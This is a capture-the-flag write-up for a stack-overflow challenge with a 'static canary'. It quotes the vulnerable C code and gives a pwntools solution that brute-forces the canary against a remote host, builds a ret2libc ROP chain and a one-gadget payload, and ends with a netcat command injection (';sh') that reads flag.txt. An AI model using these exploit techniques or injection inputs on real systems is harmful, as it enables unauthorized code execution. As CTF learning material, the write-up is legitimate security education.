og_bars is used as the static canary in this challenge,
c
1 2 3 4 5 6 7 8 9 10 11
char og_bars[BAR_SIZE];
voidread_og_bars(){ FILE *f = fopen("og_bars.txt", "r"); if(f == NULL){ printf("The OG bars are missing, either run the binary on the server or contact admin.\n"); exit(0); } fread(og_bars, sizeof(char), BAR_SIZE, f); fclose(f); }
and Stack Smashing Detected will be triggered while og_bars modified.
c
1 2 3 4
if(memcmp(bars, og_bars, BAR_SIZE)){ printf("*** Stack Smashing Detected ***: The og bars were tampered with.\n"); exit(-1); }
NOTE: Stack Smashing Detected will NOT be triggered if we overwrite og_bar to the right value.
voidrap_battle(){ char bars[BAR_SIZE]; char buf[MAXLEN]; char bar_len[MAXLEN]; int count, x=0;
memcpy(bars, og_bars, BAR_SIZE); puts("Can you defeat bobby in a rap battle?\n"); printf("What's the size of your bars?\n"); while(x<MAXLEN){ read(0, bar_len+x, 1); if (bar_len[x] == '\n') break; x++; } sscanf(bar_len, "%d", &count);
puts("Spit your bars here: ");
read(0, buf, count); gets(buf);
if(memcmp(bars, og_bars, BAR_SIZE)){ printf("*** Stack Smashing Detected ***: The og bars were tampered with.\n"); exit(-1); } fflush(stdout); }
Solution
We can use read(0, buf, count) to brute force the static canary.
# p = process(local_file) p = remote('35.238.225.156',1002)
payload = 'A'*36+og_bar+c sla('What\'s the size of your bars?\n',str(len(payload))) sea('Spit your bars here: \n',payload) sl('') try: data = rc() print data p.close() return-1 except Exception as e: print'good' p.close() return c
og_bar = '' if(len(argv)>1): og_bar = argv[1] table = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\n' while len(og_bar)<=8: for c in table: res = bf(og_bar,c) print'trying',og_bar+c if res != -1: og_bar += c break # pause() print'og_bar:', og_bar
after we know the canary, we can easily solve it by ret2libc.
# leak libc and back to main payload = 'A'*36+'-V1p3R_$' sla('What\'s the size of your bars?\n',str(len(payload))) sea('Spit your bars here: \n',payload) debug() payload += cyclic(12) payload += p64(prdi) + p64(elf.got['fopen']) payload += p64(elf.sym['puts']) payload += p64(main) sl(payload)
# one gadget payload = 'A'*36+'-V1p3R_$' sla('What\'s the size of your bars?\n',str(len(payload))) sea('Spit your bars here: \n',payload) payload += cyclic(12) payload += p64(libcbase+og[0]) sl(payload)
% nc 35.238.225.156 1004 (list_me_like_crazy) Is this lsass I dont understand :) Give me your arguments: ;sh Result: ls ;sh: flag.txt lsass cat flag.txt b00t2root{R0p_cHa1nS_ar3_tH3_b3st}